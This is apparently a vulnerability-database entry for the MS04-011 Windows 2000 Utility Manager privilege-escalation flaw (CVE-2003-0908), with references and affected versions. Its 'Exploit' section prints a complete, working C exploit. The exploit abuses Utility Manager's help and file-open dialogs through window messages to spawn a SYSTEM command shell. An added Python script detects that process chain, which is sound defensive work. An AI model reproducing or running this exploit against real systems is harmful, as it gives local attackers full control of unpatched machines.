Microsoft Windows Utility Manager Privilege Escalation Vulnerability (MS04-011)

Vulnerability ID: 1107884    Vulnerability type: access validation error
Published: 2004-04-15    Updated: 2007-10-02
CVE ID: CVE-2003-0908    CNNVD ID: CNNVD-200406-015
Platform: Windows    CVSS score: 7.2
|Vulnerability sources
https://www.exploit-db.com/exploits/271
https://www.securityfocus.com/bid/10124
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200406-015
|Vulnerability details
Microsoft Windows 2000 includes Utility Manager, which is used for management of the computer, performance services and similar tasks. Utility Manager contains a privilege escalation flaw in the way it launches applications: a locally logged-on user can exploit it to start arbitrary applications with SYSTEM privileges and thereby take control of the system. No detailed vulnerability information is currently available.
|Exploit
// By Cesar Cerrudo cesar appsecinc com
// Local elevation of privileges exploit for Windows Utility Manager
// Gives you a shell with system privileges
// If you have problems try changing Sleep() values.

#include <stdio.h>
#include <windows.h>
#include <commctrl.h>
#include <Winuser.h>

int main(int argc, char *argv[])
{
  HWND lHandle, lHandle2;
  POINT point;

  // filter pattern typed into the Open dialog; "?" matches the last character of cmd.exe
  char sText[]="%windir%\\system32\\cmd.ex?";

  // run utility manager
  system("utilman.exe /start");
  Sleep(500);

  // execute contextual help
  SendMessage(FindWindow(NULL, "Utility manager"), 0x4D, 0, 0);
  Sleep(500);

  // open the file open dialog window in Windows Help
  PostMessage(FindWindow(NULL, "Windows Help"), WM_COMMAND, 0x44D, 0);
  Sleep(500);

  // find open file dialog window
  lHandle = FindWindow("#32770","Open");

  // get input box handle
  lHandle2 = GetDlgItem(lHandle, 0x47C);
  Sleep(500);

  // set text to filter listview to display only cmd.exe
  SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
  Sleep(800);

  // send return
  SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);

  // get navigation bar handle
  lHandle2 = GetDlgItem(lHandle, 0x4A0);
  // send tab
  SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
  Sleep(500);
  lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
  // get list view handle
  lHandle2 = GetDlgItem(lHandle2, 0x1);

  SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
  SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
  SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
  Sleep(500);

  // popup context menu
  PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
  Sleep(1000);

  // get context menu handle
  point.x =10; point.y =30;
  lHandle2=WindowFromPoint(point);

  SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);   // move down in menu
  SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);   // move down in menu
  SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return

  SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window

  return(0);
}

// milw0rm.com [2004-04-15]
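The flaw above leaves a recognisable trace: a shell running as SYSTEM whose parent chain leads back to utilman.exe, which should only ever start accessibility tools and its help viewer. The following detection script is an added example written for this page, not code from the advisory or from the exploit author; the process records are constructed, the expected-children list and the "winhlp32.exe" image name for the Windows Help viewer are assumptions, and the check walks the full ancestry so the intermediate help process does not hide the shell.

```python
# Added detection example: flag SYSTEM processes descending from utilman.exe
# that are not the tools Utility Manager is expected to launch.
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str   # executable file name only
    user: str    # account the new process runs as

# Accessibility tools Utility Manager normally starts, plus the help viewer
# opened by contextual help (assumed names, not taken from the advisory).
EXPECTED_UTILMAN_CHILDREN = {"magnify.exe", "narrator.exe", "osk.exe", "winhlp32.exe"}
SYSTEM_ACCOUNT = "nt authority\\system"

# Constructed sample records modelled on the exploit's process chain;
# pid 1310 is the SYSTEM shell, pid 2000 is an unrelated user shell.
SAMPLE_EVENTS = [
    ProcEvent(400, 4, "winlogon.exe", "NT AUTHORITY\\SYSTEM"),
    ProcEvent(1200, 400, "utilman.exe", "NT AUTHORITY\\SYSTEM"),
    ProcEvent(1210, 1200, "narrator.exe", "NT AUTHORITY\\SYSTEM"),
    ProcEvent(1300, 1200, "winhlp32.exe", "NT AUTHORITY\\SYSTEM"),
    ProcEvent(1310, 1300, "cmd.exe", "NT AUTHORITY\\SYSTEM"),
    ProcEvent(2000, 1900, "cmd.exe", "WORKSTATION\\alice"),
]

def ancestors(event: ProcEvent, by_pid: dict) -> list:
    """Parent chain of event, stopping at unknown PIDs or cycles (PID reuse)."""
    chain, seen, cur = [], {event.pid}, by_pid.get(event.ppid)
    while cur is not None and cur.pid not in seen:
        chain.append(cur)
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
    return chain

def find_suspicious(events) -> list:
    """SYSTEM processes with utilman.exe in their ancestry, minus expected tools."""
    events = list(events)
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if e.user.lower() != SYSTEM_ACCOUNT or e.image.lower() in EXPECTED_UTILMAN_CHILDREN:
            continue
        if any(a.image.lower() == "utilman.exe" for a in ancestors(e, by_pid)):
            hits.append(e)
    return hits

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print(f"pid {hit.pid} {hit.image} as {hit.user} descends from utilman.exe")
```

On a real host the records would come from Security event 4688 or a Sysmon process-creation feed rather than the constructed list.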
|Affected products
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
|References

Source: US-CERT Vulnerability Note VU#526084
Name: VU#526084
Link: http://www.kb.cert.org/vuls/id/526084
Source: US-CERT Technical Alert TA04-104A
Name: TA04-104A
Link: http://www.us-cert.gov/cas/techalerts/TA04-104A.html
Source: MS
Name: MS04-011
Link: http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx
Source: www.appsecinc.com
Link: http://www.appsecinc.com/resources/alerts/general/04-0001.html
Source: VULNWATCH
Name: 20040414 [SHATTER Team Security Alert] Microsoft Windows Utility Manager Vulnerability
Link: http://archives.neohapsis.com/archives/vulnwatch/2004-q1/0082.html
Source: XF
Name: win2k-utilitymgr-gain-privileges (15632)
Link: http://xforce.iss.net/xforce/xfdb/15632
Source: BID
Name: 10124
Link: http://www.securityfocus.com/bid/10124
Source: www.securiteam.com
Link: http://www.securiteam.com/windowsntfocus/5LP0C2ACKU.html
Source: CIAC
Name: O-114
Link: http://www.ciac.org/ciac/bulletins/o-114.shtml
Source: US Government Resource oval:org.mitre.oval:def:1046
Name: oval:org.mitre.oval:def:1046
Link: http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:1046